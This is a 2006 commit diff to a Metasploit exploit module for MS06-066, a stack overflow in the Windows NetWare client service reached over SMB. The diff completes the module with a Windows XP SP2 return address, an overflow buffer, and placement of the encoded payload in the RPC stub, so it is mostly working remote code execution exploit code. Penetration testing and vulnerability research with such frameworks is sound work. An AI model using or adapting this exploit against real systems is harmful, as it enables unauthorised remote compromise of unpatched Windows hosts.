Done, but only works with a few payloads >.>

git-svn-id: file:///home/svn/framework3/trunk@4157 4d416f70-5f16-0410-b530-b9f4589650da
2006-12-01 16:38:07 +00:00 · 2006-12-01 16:38:07 +00:00 · dc0ad61c85
parent 20a0f0b86c
commit dc0ad61c85
1 changed files with 9 additions and 8 deletions
--- a/modules/exploits/windows/smb/ms06_066_nwwks.rb
+++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb
@ -12,7 +12,8 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote
 		super(update_info(info,	
 			'Name'           => 'Microsoft Services MS06-066 nwwks.dll',
 			'Description'    => %q{
-				XXX	
+				This module exploits a stack overflow in the svchost service, when the netware
+				client service is running. 
 			},
 			'Author'         => [ 'pusscat' ],
 			'License'        => MSF_LICENSE,
@ -42,9 +43,9 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote
 			'Targets'        => 
 				[
 					[ 
-						'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
+						'Windows XP SP2', 
 						{
-							'Ret'      => 0x0BADB0D0, # umpnpmgr.dll
+							'Ret'      => 0x616566fb, # modemui.dll   [esp + 16]: popaw, ret
 						},
 					]
 				],
@ -64,16 +65,16 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote
 		# [in] [unique] wchar *
 		# [out] long
 		
-		ofstring    = Rex::Text.to_unicode('\\\\') + "A"*292 + [ target.ret ].pack('V') + "\x00\x00" 
+		ofstring    = Rex::Text.to_unicode('\\\\') + Rex::Text.rand_text(292) + [ target.ret ].pack('V') + "\x00\x00" 
 	    stubdata = 
 						NDR.long(rand(0xffffffff)) +
-                        NDR.UnicodeConformantVaryingString("AAAA" + "\x00") +
+                        NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
 						NDR.long(rand(0xffffffff)) +
-                        NDR.UnicodeConformantVaryingString("BBBB" + "\x00") +
+                        NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") +
 						NDR.long(rand(0xffffffff)) +
-                        NDR.UnicodeConformantVaryingString("CCCC" + "\x00") +
+                        NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
 						NDR.long(rand(0xffffffff)) +
-                        NDR.UnicodeConformantVaryingString("DDDD" + "\x00") +
+                        NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") +
                        NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)